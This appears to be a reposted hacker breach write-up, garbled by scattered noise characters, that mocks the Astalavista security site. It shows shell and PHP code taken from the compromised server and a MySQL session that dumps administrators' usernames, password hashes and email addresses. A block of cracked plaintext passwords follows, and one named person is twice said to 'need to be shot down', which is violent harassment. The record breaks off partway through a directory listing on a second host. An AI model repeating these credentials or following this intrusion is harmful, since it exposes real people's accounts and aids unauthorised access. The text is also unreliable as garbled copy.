, |# k! W  F7 q9 Y8 N: y$ q/ m* M. S
        }# P5 w- A0 }8 O
[snip]: g0 Y3 D- Y/ l& f
    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>4 _4 E/ g# N# W7 o
<rss version=”2.0″>) I: C2 P/ t) p, [5 @; A
    <channel>
/ e" s& X' {, _4 r5 ~& n        <title>ASTALAVISTA.com - Exploits</title>
: q( H0 _% _5 A( Q* s) `. z        <link>http://www.astalavista.com/exploits</link>
! d+ ]! @& A- u! K        <description>All availably Exploits.</description>
3 \- l) p0 Y0 q: t: s. h5 a: o        <language>en-us</language>% T6 W- P, H) z9 ~( e* y
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>4 a% \) F( B; t
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
" d" R/ ~% x/ S! q7 l0 ?, P$ X        <generator>Astalavista.com</generator>
+ i$ y( m$ ^0 w8 `4 F# G. P! t* I        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘+ C2 ]& a, M8 g7 c, Q
    </channel>
" N7 t. r5 ?% s# L</rss>’;
+ A( x& ]7 g1 v6 M/ m5 u2 C
* g0 h) I- c1 l    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
, {1 O. n: q$ x; e7 G2 _- Q        unlink (FULLPATH . ‘/feed/exploits.xml’);) H% j# u6 t' a
    }& X2 Q& C: t: P! Z  p% I
" B& G" ?' Q. m' z0 g
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
" R0 J  r5 c4 m& e[snip]9 U7 q) y$ v3 H9 S7 u
4 K9 Y  S: l( w7 @" T; S. R
sh-3.2$ cat exploits.sh: E. z1 t  y7 V6 L, W
#!/bin/sh( U, Q, w! W8 W2 Z

+ @1 m4 H% a( ?" F: G4 ~4 R. S: R###########################################################
# z' y' M' s) t& `5 d#                                                         #9 P7 q/ I- `$ J% t' v: p! N
#   Title:        milw0rm exploits adder                  #- O4 Q& [8 h2 j3 ]0 c6 H! N
#   Description:  Add all milw0rm exploits to the         #
: o$ {* }  A, t; i% a#                 Astalavista.com database                #  V8 p, {5 K6 G; U
#                                                         #
+ I8 x- ~4 {) K3 S; x# a' S#   Company:      Astalavista Group                       #! v0 e/ [' ?8 b# Z: q" I# \
#   Author:       Paulo M. Santos                         #7 U9 L" `4 Z. c/ V) H; H8 r: Z
#   E-Mail:       链接标记paulo.santos@astalavista.ch             #- B4 U/ f+ f7 |5 i( F, K; C# t3 j6 R
#                                                         #
0 x, n+ A% ~" K) [  {5 [) Q7 a+ X###########################################################8 M- C# O; j1 c$ m) ]9 F% q

6 u, O+ K, v' P5 G' H$ z# path
( N5 E4 W* [4 M: k! mthis_path=/home/com/public_html/modifications/cronjobs. [$ M2 s# V6 f( K( D4 L: b6 }
  N  @8 ~. u+ J+ N7 p
# change directory
7 d) ^2 }# Z' J5 |4 Ucd $this_path
. q. U: ~- Q4 g# o* Bcd tmp/7 ~) n# P: F. {; p# ]9 Y2 \

5 z0 j' d6 b) b' t4 q# delete files3 d; N- \; V3 [4 J% Y
rm -rf milw0rm.tar.* &6 ~# b" |, D# `
rm -rf milw0rm/ &
5 r8 Y1 Y$ p; B) t( C. q+ l1 w
8 T3 U1 Y. V! x6 N4 |7 H& x# wget milw0rm paket
1 q/ g$ r, ?$ u! D' N! V, f1 ywget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
7 Z( K- v# B1 n$ \( _2 c
$ [7 N2 o9 N$ g/ N# extract milw0rm paket7 ]) H! |/ t8 z
tar -xvf milw0rm.tar.bz2
  ]  R, x7 _" {% T6 a  H3 O* w2 I2 g) Z3 X( ~
# change owner' l, @( K3 N) K& M- b% c1 B
chown -R com ./ G% X& u7 @; Y! X/ D
chgrp -R com .
/ a! h7 }7 _% |6 }
1 a) a7 o; a' a% M$ j6 O/ x/ l# e# execute php script; ]  |2 w$ R& S5 D7 X
cd $this_path4 C) `) g( S' K1 Q- I
php -q exploits.php
" Z0 J2 D' a4 C5 X; S# a
* I7 {" @5 t: r3 n0 e- F) [6 L# delete files( X+ r3 w3 V, N
rm -rf tmp/milw0rm.tar.*
, J9 Z! c5 g* p& H+ F" Xrm -rf tmp/milw0rm/
6 l7 g8 z/ c' k5 `7 W' H
( g2 \) A! p' q& B/ _8 fsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
, c0 g3 ^0 B1 F9 h" u! YPaulo M. Santos needs to be shot down.
9 n0 B9 v* H+ V6 }6 U6 Z( t; ?/ ^6 q# v
mysql -u contrexxuser2 -p) V4 ?' o1 a* \3 }- O! ^
Enter password:
* g5 A! [( G0 m, CWelcome to the MySQL monitor.  Commands end with ; or \g.) d( V$ N9 z# x/ q
Your MySQL connection id is 261694! j5 {7 e/ S3 f7 H, ]
Server version: 5.0.45-community-log MySQL Community Edition (GPL)/ H2 j2 K7 c" h' u

" g3 N2 @/ {. P$ ^9 {! OType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 i1 B4 C1 I4 j! S1 V% f

" g3 @$ E9 I3 g2 |  R( P+ D- B( q' {mysql> show databases;
6 o* l9 |% a8 _7 B+——————–+
" E! v, s" y" @1 l| Database           |% ^9 l/ _' C) M: V/ x
+——————–+% i  N5 m; X2 r3 _6 ?* i( ~5 B
| information_schema |- o) ~3 Q+ W4 i" W8 W9 m
| com_contrexx2      |
# X7 G3 G& c3 }3 \| com_contrexx2_live |; k' Z! d8 B9 r8 E: A; F
| test               |% z* _6 W9 g2 E& q
+——————–+
* [0 _" s8 ^4 h! @4 rows in set (0.00 sec)
& G& p. Z$ Q4 H
4 o" H; @$ s% ~9 Z- Xmysql> use com_contrexx2_live
' E9 q/ W; U- X3 f1 s5 R2 s+ u  eDatabase changed1 T& Q) K) R3 `: s$ [3 g
mysql> show tables;
& Q. S3 l. `% @6 O+————————————————–+2 M: I/ e5 D  M/ n/ D
| Tables_in_com_contrexx2_live                     |/ W: x& d0 o' s/ M* t6 ~
+————————————————–+2 B2 r4 L6 Y9 Y2 Y; |
| cc_banner_counter                                |
- @0 c+ H6 ~: k% Q( k  T) M( m| cc_search_counter                                |
( h: t% J. |' B3 ]" |. u# c| contrexx_access_group_dynamic_ids                |: V& `* y  u+ O9 }! ~& G" P6 y9 M
| contrexx_access_group_static_ids                 |8 n$ A% |. p$ g# y, X0 x2 L6 X4 z
| contrexx_access_rel_user_group                   |# B/ }* g) z/ W+ l, w
| contrexx_access_settings                         |
; P% L" I% Q7 j" Y' x| contrexx_access_user_attribute                   |
+ g% Q$ I. V; K2 F( p* i( I) V| contrexx_access_user_attribute_name              |' T1 W- d6 d. c* O( K' Y' D8 }" Z+ ]% |
| contrexx_access_user_attribute_value             |3 ^& g" q* p1 P: {  v6 X1 H2 M
| contrexx_access_user_core_attribute              |
8 X- d1 _$ V" Y# n1 t| contrexx_access_user_groups                      |
8 B. g, Z  L* g7 j7 t& V; e| contrexx_access_user_mail                        |
- R  q  d! x3 i7 n9 X| contrexx_access_user_profile                     |: a/ P; v0 u  U3 O$ E
| contrexx_access_user_title                       |9 t& ~* e, h% x8 l5 \, v3 _
| contrexx_access_user_validity                    |
1 z' G; ~! {2 @/ E| contrexx_access_users                            |
" H; d, R1 k/ A; Y& k| contrexx_backend_areas                           |
/ ?" {4 M2 Z0 X" t4 V| contrexx_backups                                 |9 w4 x. P/ z: v" g: I
| contrexx_content                                 |7 D: q- R5 k7 Z9 C  y
| contrexx_content_history                         |! m8 }6 n3 r8 t% L) ?  G. S9 v1 `
| contrexx_content_logfile                         |
6 q7 P( D% e+ q, _6 M2 @1 ]) T| contrexx_content_navigation                      |+ }; J# X, L+ v# W7 E1 D3 ]2 G
| contrexx_content_navigation_history              |7 j! s2 X# s$ x/ z( D
| contrexx_ids                                     |
7 B. c5 x* i2 W' X| contrexx_languages                               |& Q) L6 F% C! e2 ^
| contrexx_lib_country                             |
" h  b5 V6 ~2 N% O| contrexx_log                                     |
2 R' x% w7 w3 D! h| contrexx_module_alias_source                     |
' ^1 k3 k- L. `& j2 {* _| contrexx_module_alias_target                     |% E5 K- o# }+ ~! C9 \
| contrexx_module_block_blocks                     |9 T/ V' ~" Y8 }8 A; z
| contrexx_module_block_rel_lang                   |
' t2 n; b6 p- |+ u# R| contrexx_module_block_rel_pages                  |
5 x" D$ {- H+ j* G/ || contrexx_module_block_settings                   |
( f! j8 h" h2 c7 ^: q| contrexx_module_blog_categories                  |8 i( u& x$ X. L# \5 k1 j: @
| contrexx_module_blog_comments                    |: E2 s) p, o# `. e. J0 E# V
| contrexx_module_blog_message_to_category         |
7 G3 F* k/ U4 V) D9 S5 U# j# B; @| contrexx_module_blog_messages                    |
: ^0 h$ P( j6 c# r! H- E1 m| contrexx_module_blog_messages_lang               |
( [' j/ G2 Q; |9 M| contrexx_module_blog_networks                    |- Z6 O/ b& a5 g4 k
| contrexx_module_blog_networks_lang               |
: d; t& z( k( V/ ~; q) W8 Y0 C( V3 x9 v| contrexx_module_blog_settings                    |
, B4 }9 |9 S' c5 v0 R$ n0 M| contrexx_module_blog_votes                       |
* a1 f% T" e# j9 M" C; K| contrexx_module_calendar                         |
( K! u. K& w8 t8 h) K: R| contrexx_module_calendar_access                  |
- Y4 W$ D3 q. [2 Z1 S5 [# [" [| contrexx_module_calendar_categories              |
; r' S& y4 b; ]) A7 X1 O! z| contrexx_module_calendar_form_data               |: W  e9 Z, W3 Q% C" v. M9 f4 r
| contrexx_module_calendar_form_fields             |( ^8 J# ?. s' p6 V
| contrexx_module_calendar_registrations           |9 J9 w7 h' A/ l7 q, o9 Q  ^
| contrexx_module_calendar_settings                |
) A/ R- f8 b) v" z, Q| contrexx_module_calendar_style                   |
* ^2 s  r1 ~8 o' i  w$ X6 z| contrexx_module_contact_form                     |0 @+ `6 k, ], o- f. `! X
| contrexx_module_contact_form_data                |
0 x9 V, ^( Q- K8 k8 c- ^; Z| contrexx_module_contact_form_field               |1 l" h. o  H/ G
| contrexx_module_contact_settings                 |
! C- J' b" U, Q* r: y( q| contrexx_module_data_categories                  |' S6 [3 w9 \& G! d* s  r
| contrexx_module_data_message_to_category         |7 S$ A$ P4 a* |% |+ k7 O4 A  r6 u* K3 c
| contrexx_module_data_messages                    |
. r/ |, C4 a! @| contrexx_module_data_messages_lang               |
4 V. c5 v: d! q5 A| contrexx_module_data_placeholders                |+ i- [$ s$ K. ?( ?3 I
| contrexx_module_data_settings                    |% Z; i! G/ K  c  |" v
| contrexx_module_directory_access                 |; \+ m2 D+ |  r7 ]3 z% H" s
| contrexx_module_directory_categories             |
& p8 ~& i) [' ~3 E| contrexx_module_directory_dir                    |
0 ^% @! N; F5 U' Y/ ]# s| contrexx_module_directory_inputfields            |
7 D5 t3 X, c2 ~# c# C: K| contrexx_module_directory_levels                 |4 O# F0 t( T9 }) P, Z; _
| contrexx_module_directory_mail                   |
% r" D! D0 P* c& V0 c% h| contrexx_module_directory_rel_dir_cat            |
$ L  g9 h/ z  o0 ]) h| contrexx_module_directory_rel_dir_level          |
, e- S+ E1 A+ ^2 W| contrexx_module_directory_settings               |
. a7 m. E2 k. O& |' w6 q, R| contrexx_module_directory_settings_google        |
  o% P* E7 _% r- K3 W6 w| contrexx_module_directory_vote                   |
& g& _: H* Z* T  J- E+ k| contrexx_module_docsys                           |
& H) Y+ T9 e6 w9 e( t* m| contrexx_module_docsys_categories                |4 Y6 j1 K' {8 l4 {, {( F0 l# A
| contrexx_module_egov_configuration               |
% \. v& M- \" o* S| contrexx_module_egov_orders                      |, p) W0 D! k+ ^! U
| contrexx_module_egov_product_calendar            |0 d1 G* O  s* @3 w! I; Y
| contrexx_module_egov_product_fields              |& j7 K4 w6 h- B% r
| contrexx_module_egov_products                    |
7 t( |* [3 o/ ^! S! `| contrexx_module_egov_settings                    |+ K- p9 L5 U2 C( u" v, i
| contrexx_module_exploits                         |
( k3 o0 i: d3 x3 D5 f| contrexx_module_exploits_categories              |- ]2 n7 x: R% V  X# o  \* J5 p3 Z
| contrexx_module_feed_category                    |
" v3 }- b3 _) d$ F2 V: x, d| contrexx_module_feed_news                        |
6 }1 R0 \* Y7 u& U| contrexx_module_feed_newsml_association          |
  b- m3 g% i* }' u  z0 O( R| contrexx_module_feed_newsml_categories           |
# F3 y" r  v" X, f2 O, T| contrexx_module_feed_newsml_documents            |
5 R% V# K! q0 `3 B| contrexx_module_feed_newsml_providers            |- g- {! G. r6 e4 I
| contrexx_module_forum_access                     |1 l3 I) \( Y1 V) L; Z
| contrexx_module_forum_categories                 |
& a) Y, V! z% L. m! r3 f. \| contrexx_module_forum_categories_lang            |4 Y, q1 ~7 G+ m* [1 v
| contrexx_module_forum_notification               |
- I$ @/ l. i4 q/ u4 b| contrexx_module_forum_postings                   |9 {4 |1 Q: j* C$ X$ Y5 z$ r
| contrexx_module_forum_rating                     |2 W7 O. v( g: J4 O
| contrexx_module_forum_settings                   |& e8 O, h2 ~" I1 E, E" T8 j( Z
| contrexx_module_forum_statistics                 |
4 k9 m1 X% X( y4 \' J& M2 \2 T| contrexx_module_gallery_categories               |3 T3 C3 `, T6 g+ I' q
| contrexx_module_gallery_comments                 |& [3 w, J; l) q1 s' n2 H0 u( z
| contrexx_module_gallery_language                 |
0 [5 k; G1 a# H7 O| contrexx_module_gallery_language_pics            |# B: c$ O' X1 W, k* ~" c' D
| contrexx_module_gallery_pictures                 |! ?. ]: Z4 W& g+ m
| contrexx_module_gallery_settings                 |: M3 N/ B+ O; `2 ]& N
| contrexx_module_gallery_votes                    |
7 S4 J: L7 l; Z! @) H7 ?. l& f| contrexx_module_guestbook                        |
' i/ `; a( r, k5 ^" Q! @| contrexx_module_guestbook_settings               |
1 k* O; z" h, R( }9 @| contrexx_module_livecam                          |+ [" o9 P+ W, I4 U& p: o8 O% K/ ~6 ]. H
| contrexx_module_livecam_settings                 |9 j; u8 b3 b- A% D! ^: Z
| contrexx_module_market                           |
! q9 Y% |" `, n| contrexx_module_market_access                    |
/ O  Y: T" \1 g* l6 [  N7 Y| contrexx_module_market_categories                |
0 o) R5 D# A2 v, W" {- I| contrexx_module_market_mail                      |2 {5 x: ^/ Z8 W% u1 A
| contrexx_module_market_paypal                    |) d) ~. G$ |) A: j
| contrexx_module_market_settings                  |
+ E, ?9 p( m0 j| contrexx_module_market_spez_fields               |
7 e+ D5 O, y6 a. f, n& [| contrexx_module_mediadir_access                  |* h( i, ?( {/ {  r
| contrexx_module_mediadir_categories              |$ p  b! t7 i0 N/ U5 e0 ?
| contrexx_module_mediadir_comments                |
3 r% K9 H# W3 N. B| contrexx_module_mediadir_dir                     |
# j# N4 X0 X, K2 f  ^, i| contrexx_module_mediadir_inputfields             |
7 V. |2 W; [4 d( a5 h| contrexx_module_mediadir_levels                  |
1 R/ s$ V+ _1 ?7 f$ a% J6 k| contrexx_module_mediadir_mail                    |
$ K' V2 Y) E4 o  F1 R$ A| contrexx_module_mediadir_rel_dir_cat             |
8 b5 ?1 @1 A: d- `1 a9 G' X4 || contrexx_module_mediadir_rel_dir_level           |
3 f: z7 ^0 d4 E% ~5 v7 C| contrexx_module_mediadir_reports                 |- y: b* n1 U' |9 Z: Z+ n
| contrexx_module_mediadir_settings                |0 W4 c4 T. V8 N& ^8 T: L5 s
| contrexx_module_mediadir_settings_google         |# H3 z; O+ G9 h3 F1 H
| contrexx_module_mediadir_vote                    |
9 ^8 g( g+ k6 x8 m# G| contrexx_module_memberdir_directories            |
5 W. y+ t& g0 L4 w2 v3 j| contrexx_module_memberdir_name                   |
* }/ e0 i, _# K- v# O| contrexx_module_memberdir_settings               |' d+ W( G; h# v" L" M# m: n4 Q3 \2 ^
| contrexx_module_memberdir_values                 |6 |/ @# P/ D  u# ?  |
| contrexx_module_nettools_allowed_groups          |
% ^$ I$ w3 ~: a" h2 @' x| contrexx_module_nettools_settings                |
( i% I0 X$ B4 d3 [" D5 D7 R& X| contrexx_module_news                             |9 z8 }7 ^& X; k" O
| contrexx_module_news_access                      |
, @4 e9 _9 z" F5 x. q| contrexx_module_news_categories                  |
6 N0 n5 p0 P' c& |8 g| contrexx_module_news_settings                    |
. F. F  U8 W  {# m, {. ?9 W7 K| contrexx_module_news_teaser_frame                |4 L0 `/ c) y- b. R5 Y5 N2 z! A/ q+ v
| contrexx_module_news_teaser_frame_templates      |
$ S: L9 i3 e6 l; Y6 f% F7 B0 o| contrexx_module_news_ticker                      |
8 U" \/ E7 E7 i) C7 C- U( }| contrexx_module_newsletter                       |6 e3 q3 p' y6 y/ I
| contrexx_module_newsletter_attachment            |
1 L) L8 ?4 ?& ^) i$ m# P| contrexx_module_newsletter_category              |: H2 _! H$ Z6 U1 M# J
| contrexx_module_newsletter_confirm_mail          |8 \1 z+ @7 e- x: E8 m7 \8 v( U
| contrexx_module_newsletter_rel_cat_news          |
+ _5 t0 e) ?& r% ^& c| contrexx_module_newsletter_rel_user_cat          |, ?  a7 c  y! {4 U& E
| contrexx_module_newsletter_settings              |
7 p3 n% X& v- J: ~1 q5 ~| contrexx_module_newsletter_template              |& q& U" H9 i/ |: [; i8 V, ^7 r( M% Z
| contrexx_module_newsletter_tmp_sending           |  ~' q( Z1 F! C* d
| contrexx_module_newsletter_user                  |! R. y- ]( k" S& |# c: `
| contrexx_module_newsletter_user_title            |
* R1 ]2 k) s' C: _& _; e| contrexx_module_onlinetools_defaultports         |1 r* f; D- W7 k$ I7 B  k9 L
| contrexx_module_onlinetools_defaultports_back    |
0 t& r. y1 l$ h4 L' Y- p| contrexx_module_onlinetools_geolitecity_blocks   |3 m- K% r7 e0 `$ Z3 N: J/ J% f
| contrexx_module_onlinetools_geolitecity_country  |, t4 T9 s( a& _/ C1 p  l1 |
| contrexx_module_onlinetools_geolitecity_location |/ J& I: x! h9 @  Z. [# H
| contrexx_module_podcast_category                 |/ u- H+ ~7 P: W7 ^4 P5 f
| contrexx_module_podcast_medium                   |
7 f9 T+ E% \: K1 i4 k& m| contrexx_module_podcast_rel_category_lang        |
, E/ u2 o7 ~6 p8 ]| contrexx_module_podcast_rel_medium_category      |
6 @- n0 V/ Q$ T/ f+ @; F: G) f| contrexx_module_podcast_settings                 |
" `, |$ Y0 e0 @1 c5 w| contrexx_module_podcast_template                 |# [' s- q4 ~) R, P% l
| contrexx_module_proxydb                          |
1 B1 t8 V3 h5 a) O; N8 j* g! Q| contrexx_module_recommend                        |
5 d4 ~' o" ^- m, U6 Z| contrexx_module_repository                       |
; a/ p: I9 p4 R0 M# @4 N| contrexx_module_securitynews_cats                |
" s9 I) P7 X* ?+ R| contrexx_module_securitynews_feeds               |
) `' o7 `5 g5 Z1 I  J5 v| contrexx_module_securitynews_news                |; ^( \2 d/ {9 }5 ~; l( v( d0 R& t6 F
| contrexx_module_shop_categories                  |6 C* s& n' |& B, j
| contrexx_module_shop_config                      |
4 ?. E( F2 s$ u1 Q; k/ h| contrexx_module_shop_countries                   |
8 M( K7 O- n% u: B$ V, {1 l| contrexx_module_shop_currencies                  |- @' w) Z' N/ m( I, B# C" r" _* c
| contrexx_module_shop_customers                   |' ~) p9 o4 H$ J8 k5 |: |
| contrexx_module_shop_importimg                   |$ ^7 ~& V! ^# o" L; l
| contrexx_module_shop_lsv                         |' c7 v( d8 G1 |0 a# O/ Z: m0 `
| contrexx_module_shop_mail                        |8 ?( r( R- g" R2 }$ D
| contrexx_module_shop_mail_content                |
& u& }9 E/ l) M| contrexx_module_shop_manufacturer                |
- q  \# U( Y( V) }4 f| contrexx_module_shop_order_items                 |9 K  I7 R/ o- V: d# u* q. x( t8 t
| contrexx_module_shop_order_items_attributes      |
; I0 }. J# j% `) j9 e2 a  I| contrexx_module_shop_orders                      |: r4 z; e  w/ M  |  j0 O. z& ]
| contrexx_module_shop_payment                     |3 h; w# N4 G0 k+ ^6 c
| contrexx_module_shop_payment_processors          |! ]/ q/ j  X& r; T8 l* s. N0 Q
| contrexx_module_shop_pricelists                  |  Z' u4 T) |8 B. j# a- Q' a
| contrexx_module_shop_products                    |
6 A, }, G1 o2 y| contrexx_module_shop_products_attributes         |0 g, u6 [  m/ N7 g8 k
| contrexx_module_shop_products_attributes_name    |5 V2 c4 b5 c+ D; w. e5 D: B# X
| contrexx_module_shop_products_attributes_value   |
& o$ _" L9 q. c% c; I8 H0 I8 w| contrexx_module_shop_products_downloads          |; f: {4 p! v. N0 g
| contrexx_module_shop_rel_countries               |
: y' \. J) A( {, G4 f. ^) T( K| contrexx_module_shop_rel_payment                 |
  }5 l1 o' c) n' V| contrexx_module_shop_rel_shipment                |
, z# v7 {4 m6 |* w8 H: m7 e| contrexx_module_shop_shipment_cost               |. {6 u& ]& ?: G6 ^
| contrexx_module_shop_shipper                     |% c5 Y: C1 K8 O6 R& K* i
| contrexx_module_shop_vat                         |
: q9 S3 I; J% P8 g+ B( c| contrexx_module_shop_zones                       |( e9 P3 ]& V5 y
| contrexx_module_u2u_address_list                 |
+ b8 Y; U6 f/ S- v% J( U8 d. P  p| contrexx_module_u2u_message_log                  |
. e4 ~3 @0 w7 ~2 W1 t3 W# R| contrexx_module_u2u_sent_messages                |
0 x6 R9 E2 j/ }4 b% R| contrexx_module_u2u_settings                     |9 G5 W1 Y" d) m. @# i$ y# T
| contrexx_module_u2u_user_log                     |& [' l# G+ ?( w% Y3 A7 V
| contrexx_modules                                 |
8 |; d( r: D3 V: ~  |4 N. x' _| contrexx_sessions                                |( v' l5 r, w5 O8 o* R9 V; F7 @" m
| contrexx_settings                                |
4 K0 `9 _; `" l& }2 u$ j| contrexx_settings_smtp                           |9 `! C: N1 {; s4 g. H
| contrexx_skins                                   |
) t, P. n7 |: k3 h| contrexx_stats_browser                           |+ I  l2 a9 p, g* {
| contrexx_stats_colourdepth                       |2 z& ]# u3 U; @  m
| contrexx_stats_config                            |
9 X: `2 n! h+ R. O0 ?6 Y6 H+ s" ^, }| contrexx_stats_country                           |; ^- L6 `# z' K5 M7 V8 V
| contrexx_stats_hostname                          |, w" v5 O# U: i+ S7 y7 D+ M
| contrexx_stats_javascript                        |
6 L. L. T! f) {% p2 U% `+ `| contrexx_stats_operatingsystem                   |
3 n/ @& ^* ?* M4 j7 z- a% t| contrexx_stats_referer                           |+ |, H2 z& K. |' T  @/ [
| contrexx_stats_requests                          |1 L3 [$ x' S4 Y# A1 A' C+ u
| contrexx_stats_requests_summary                  |
1 A! S: {# `- Q| contrexx_stats_screenresolution                  |
3 k+ y. S: Q( ?. d8 u. {7 b& h| contrexx_stats_search                            |
; ]7 R" d; D0 F1 U, }0 S| contrexx_stats_spiders                           |2 H9 O% Y6 L5 y, b( z% M; s
| contrexx_stats_spiders_summary                   |
/ N# u# O7 @- Z8 q1 T; w: Z! p| contrexx_stats_visitors                          |
$ m5 h; Z' M/ j% R: J* f9 y  _| contrexx_stats_visitors_summary                  |) j0 w$ J+ N4 _( L, F2 a4 a
| contrexx_voting_additionaldata                   |! g$ }: J4 U' k" P" }4 U
| contrexx_voting_email                            |% p5 X2 }. d6 O8 d- y
| contrexx_voting_rel_email_system                 |) v7 G( j7 u3 i3 v) Q
| contrexx_voting_results                          |
4 W  [" b, H7 R0 R9 L| contrexx_voting_system                           |9 ~% l* s: \+ W  E+ s
| foo                                              |  a% ?: o! W1 C/ }
+————————————————–+" ~# D( p" ?# |" E% [8 \% r  O: ]
227 rows in set (0.01 sec)# e9 z, k7 j  I% A4 p- ]2 a
- q0 ]+ ]! J) m% i4 J: R
mysql> select count(*) as skids from contrexx_access_users;
( s! b( `) q( Z! p7 B9 U- V3 t' i+——-+
, u. H  @+ i# h2 N$ J1 ^| skids |& _1 @: Y$ s3 s1 V2 N9 u4 a. m, Q
+——-+
  f# G6 H0 K! z  n| 53699 |  `' k1 F+ G  y+ |/ A4 I
+——-++ f, M6 L  [+ U4 v
1 row in set (0.00 sec)  Z2 y' ]- o& u8 d' N( M) J

4 K! i$ {. z! b* w( Smysql> describe contrexx_access_users;& c* Y+ _4 E8 i; O3 k
+——————+——————————————+——+—–+————–+—————-+* V* ^% U% X1 ~, A
| Field            | Type                                     | Null | Key | Default      | Extra          |
/ r1 i7 W* }) R+——————+——————————————+——+—–+————–+—————-+8 c3 g! F1 x4 T+ D* U) Q
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
- T- J$ q! _. }6 a# Q, j: I: t| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
- \' m0 s2 t, s- \| username         | varchar(40)                              | YES  | MUL | NULL         |                |* Q9 K: \6 G7 C8 S: ?* |5 q- X& |
| password         | varchar(32)                              | YES  |     | NULL         |                |8 J- r- [% P* v, D( I
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
; b" w; k$ k& q+ |( H% E) ~| expiration       | int(14) unsigned                         | NO   |     | 0            |                |" O4 s$ G, ]7 v+ ]2 }# L
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
0 w6 u! `) \& g) I* p| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
' F2 g9 Z# B- t9 r& r9 e$ || last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
: F$ ]! `& z/ K. T| email            | varchar(255)                             | YES  |     | NULL         |                |' S  J- I+ W+ O0 l4 G' L. i3 ~
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
; \$ m" _$ o+ o% Q7 S0 U& z| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |* s+ _9 D) O/ N/ y
| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
* S3 x- f6 ?: z4 I| active           | tinyint(1)                               | NO   |     | 0            |                |" K/ I; i. W7 H( @0 S
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |# m" g# G. v  G5 g8 s& H# C5 {
| restore_key      | varchar(32)                              | NO   |     |              |                |# X, r; z( U$ d8 A- ?/ L
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |* l% ]. H# G( S9 f  ~
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
9 @3 K; p3 L! \3 N+ t4 L2 f1 [+——————+——————————————+——+—–+————–+—————-+7 T. H+ p. t3 {8 A, E& |. E
18 rows in set (0.00 sec)
1 L$ d* K+ `; m1 J3 G* v6 H/ w5 ^
mysql> select username,password,email from contrexx_access_users where is_admin = 1;; }# H2 i) Q8 v) M' p  b
+————+———————————-+—————————–+1 n) ?- |1 O- s8 f. w4 Y6 V
| username   | password                         | email                       |9 \9 T1 }& l& y) @
+————+———————————-+—————————–+
" U4 f8 T! ~& z+ T* c. K| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |" I+ }! ~7 X* z; y
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |  w8 f/ ?2 L9 ^. }5 h
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
8 P( l* `1 T+ t| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
  b) b$ z) s" q+————+———————————-+—————————–+
2 H" `/ d5 h! v8 _3 ~4 rows in set (0.04 sec). l- b1 `% j  R( S

/ x2 I+ R, l# z/ i) G/ B$ }6 nmysql> exit;
: S4 J& O$ D% O( c, uBye# V, W  o/ c. T4 r/ y7 l; x  y, r
& U- ]8 x6 ~$ u7 \
[~] There you go, your “team of security and IT professionals” is a joke.4 t* o) N, [- x8 a1 E
, ]( Z( i1 O( t$ t* H
+——————————+4 d1 T; }# i7 X% D
system:f82BN3+_*# V: T0 ^) Y- Y3 x1 ~  W; u5 y+ c( |
Be1er0ph0r:belerophor4astacom
; I0 ~! K0 F" M3 e# uprozac:asta4cms!
3 I# o; T, D, `commander:mpbdaagf6m+ [! P) B& {' X  `( ]) A- L0 H
sykadul:ak29eral
; k( i5 T+ h% x+——————————+* T. Z2 V8 a* a  k+ J
6 ?( r) [7 [3 c
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
' n; y4 @- k. T2 ^& R…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.2 v1 l' b3 f9 K, W; @6 L, p$ P+ s' {

& M6 b3 w# {$ Q6 _: t  q1 g4 _[~] Lets move to astalavista.net now,
8 n& M! U3 N. h% p( ?8 i% z! [% j3 t1 o3 h" G0 k+ _0 c- B1 v
From <链接标记[url]https://www.astalavista.net/[/url]>:
4 n3 W1 k( D0 H. L( e' G9 C>> Everyone knows that the best defense is a good offense., p! s6 w3 C7 {* D
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.* M2 |/ _4 w' o
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
6 i7 h3 j, ?- A. R6 G. G+ m>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”9 G6 A; c) ~; D( U+ ?8 ~

( r- F8 |3 N% Q6 e) U- J! h>> Go ahead, try and hack our server . in a completely legal way!
  [) n+ _/ N7 `; q>> Learn by doing: We offer our members tricky tasks and challenges on an
& v+ k1 ^) @* q( P* Q/ A>> ongoing basis so you can test your knowledge and abilities. You can also
# g* l5 q! X: P3 p) y1 z: u>> demonstrate what you.ve mastered by taking part in regular hacker contests
: g8 q% D! ~+ o>> and war games
% X# f# g' o& B+ D$ A4 h- R( {0 y- y
, f; N$ j9 A. E$ b[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
$ S6 i3 L! m6 ?0 X
& \; `- D5 \0 V; m4 L[-] Tricky task: Find home dir of astalavista.net$ G: \. l2 V) @3 N

& p/ V' e! S& [sh-3.2$ ls -la ~astanet9 @- O& s7 x. D% {  o) f9 `+ P( Y
total 48. P' |0 V. B1 i
